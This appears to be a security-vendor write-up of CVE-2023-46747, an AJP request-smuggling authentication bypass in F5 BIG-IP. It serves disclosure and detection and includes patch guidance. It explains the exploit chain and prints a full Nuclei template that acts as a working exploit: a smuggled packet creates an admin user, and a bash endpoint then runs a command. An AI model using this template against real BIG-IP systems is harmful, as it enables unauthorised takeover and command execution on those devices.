Description:
CVE-2023-46747 is a critical vulnerability in the F5 BIG-IP Configuration Utility identified as a request smuggling bug within the Apache JServ Protocol (AJP). The flaw could potentially allow unauthenticated attackers with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. This vulnerability was discovered and reported by Thomas Hendrickson and Michael Weber of Praetorian Security. It has a CVSS score of 9.8: critical severity.
Technical Details:
The attack primarily exploits the HTTP to AJP request smuggling due to inconsistencies in handling Content-Length/Transfer-Encoding headers between Apache HTTPd and AJP Processing in Tomcat. Here's a breakdown:
1. Origin of the Discrepancy: Apache HTTPd receives an HTTP request with a Transfer-Encoding: chunked, chunked
header, which it then sends to Tomcat via AJP. Tomcat, expecting Transfer-Encoding
to be just chunked
, doesn't find a match. It then looks for a Content-length
header, which isn't there, so it defaults to assuming a Content-length of 0.
2. Resulting Desynchronization: This misunderstanding means the AJP Data packet (essentially the POST Body of the HTTP request) is misinterpreted as a separate AJP Forward Request packet.
3. Exploiting the Gap: Attackers, by crafting the POST body to precisely 516 bytes (0x204 bytes), can evade the initial authentication checks and access specific /tmui/ endpoints directed to the AJP port.
4. Bypassing Further Checks: There are additional authentication steps on many /tmui/* pages. Overcoming these requires:
- Setting the REMOTE_USER
attribute which can be done at the AJP level.
- Providing a REMOTEROLE
request header with any valid integer role id, ensuring successful authentication bypass.
5. Gaining Full Access: The goal is to find requests under 516 bytes that grant admin user access or allow remote code execution. One such request was discovered that creates an admin user through the BIG-IP UI, specifically targeting the /tmui/Control/form endpoint. Though initially oversized, the request was slimmed down by removing redundant parameters to fit within the 516-byte limit.
6. Overcoming Final Hurdles: A CSRF check exist in the user creation action that ensures if the _bufvalue
parameter matches the base64 SHA1 digest of the Tmui-Dubbuf
header and the _timenow
parameter concatenated together. Given the full control of the request we could calculate these values ahead of time. Also, to meet the requirement of exact 0x204 bytes of packet size, padding with extra "B"s in the Tmui-Dubbuf
header was added.
7. Endgame: TL;DR: attackers can establish an admin user without prior authentication. Once this is done, they can use built-in F5 functionalities to run Bash commands, allowing them to execute code.
Nuclei Template
The ProjectDiscovery research team compiled a template so that all nuclei users can detect exploitable vulnerabilities to CVE-2023-46747 in their attack surface. This was developed within 5 days of the CVE notification, and just 24 hours after the public disclosure of the details of the vulnerability.
id: CVE-2023-46747
info:
name: F5 BIG-IP - Unauthenticated RCE via AJP Smuggling
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
CVE-2023-46747 is a critical severity authentication bypass vulnerability in F5 BIG-IP that could allow an unauthenticated attacker to achieve remote code execution (RCE). The vulnerability impacts the BIG-IP Configuration utility, also known as the TMUI, wherein arbitrary requests can bypass authentication. The vulnerability received a CVSSv3 score of 9.8.
reference:
- https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
- https://my.f5.com/manage/s/article/K000137353
tags: cve,cve2023,rce,f5,bigip,unauth,ajp,smuggling,intrusive
variables:
username: "{{hex_encode(rand_base(5))}}"
password: "{{hex_encode(rand_base(12))}}"
password2: "{{rand_base(14)}}"
http:
- raw:
- |+
POST /tmui/login.jsp HTTP/1.1
Host: {{Hostname}}
Transfer-Encoding: chunked, chunked
Content-Type: application/x-www-form-urlencoded
204
{{ hex_decode(concat("0008485454502f312e310000122f746d75692f436f6e74726f6c2f666f726d0000093132372e302e302e310000096c6f63616c686f73740000096c6f63616c686f7374000050000003000b546d75692d44756262756600000b424242424242424242424200000a52454d4f5445524f4c450000013000a00b00096c6f63616c686f73740003000561646d696e000501715f74696d656e6f773d61265f74696d656e6f775f6265666f72653d2668616e646c65723d253266746d756925326673797374656d25326675736572253266637265617465262626666f726d5f706167653d253266746d756925326673797374656d253266757365722532666372656174652e6a737025336626666f726d5f706167655f6265666f72653d26686964654f626a4c6973743d265f62756676616c75653d65494c3452556e537758596f5055494f47634f4678326f30305863253364265f62756676616c75655f6265666f72653d2673797374656d757365722d68696464656e3d5b5b2241646d696e6973747261746f72222c225b416c6c5d225d5d2673797374656d757365722d68696464656e5f6265666f72653d266e616d653d",username,"266e616d655f6265666f72653d267061737377643d",password,"267061737377645f6265666f72653d2666696e69736865643d782666696e69736865645f6265666f72653d00ff00")) }}
0
unsafe: true
- raw:
- |+
PATCH /mgmt/tm/auth/user/{{hex_decode(username)}} HTTP/1.1
Host: {{Hostname}}
Authorization: Basic {{base64(hex_decode(username)+":"+hex_decode(password))}}
Content-Type: application/json
{"password": "{{password2}}"}
- |+
POST /mgmt/shared/authn/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{hex_decode(username)}}", "password":"{{pass}}"}
- |+
POST /mgmt/tm/util/bash HTTP/1.1
Host: {{Hostname}}
X-F5-Auth-Token: {{token}}
Content-Type: application/json
{"command":"run","utilCmdArgs":"-c id"}
payloads:
pass:
- '{{password2}}'
- '{{hex_decode(password)}}'
skip-variables-check: true
stop-at-first-match: true
extractors:
- type: regex
part: body_2
name: token
group: 1
regex:
- "([A-Z0-9]{26})"
internal: true
- type: regex
part: body_3
group: 1
regex:
- "\"commandResult\":\"(.*)\""
- type: dsl
dsl:
- '"Username:" + hex_decode(username)'
- '"Password:" + pass'
- '"Token:" + token'
matchers:
- type: word
words:
- "commandResult"
- "uid="
condition: and
Timeline:
- October 26, 2023: Initial advisory and limited details for CVE-2023-46747 were published.
- October 30, 2023: The Nuclei Template was released by the ProjectDiscovery Research Team.
- October 31, 2023: Full disclosure of the vulnerability was publicly shared by Praetorian
Remediation:
Patching is the strongly recommended course of action to remediate this vulnerability. F5 has provided mitigation guidance alongside patching, especially if patching cannot be performed immediately. It is advisable to review the F5 article here for recommended mitigation steps and warnings. Additionally, F5 has cautioned that the provided mitigation script must NOT be used on BIG-IP versions prior to 14.1.0.
References:
- Help Net Security Article: F5 fixes critical BIG-IP vulnerability, PoC is public (CVE-2023-46747)
- Tenable Blog Post: CVE-2023-46747: Critical Authentication Bypass Vulnerability
- NVD Entry: CVE-2023-46747
- F5 Security Advisory: K000137353: BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747
- Praetorian Blog Post: The Discovery of F5 BIG-IP Vulnerability CVE-2023-46747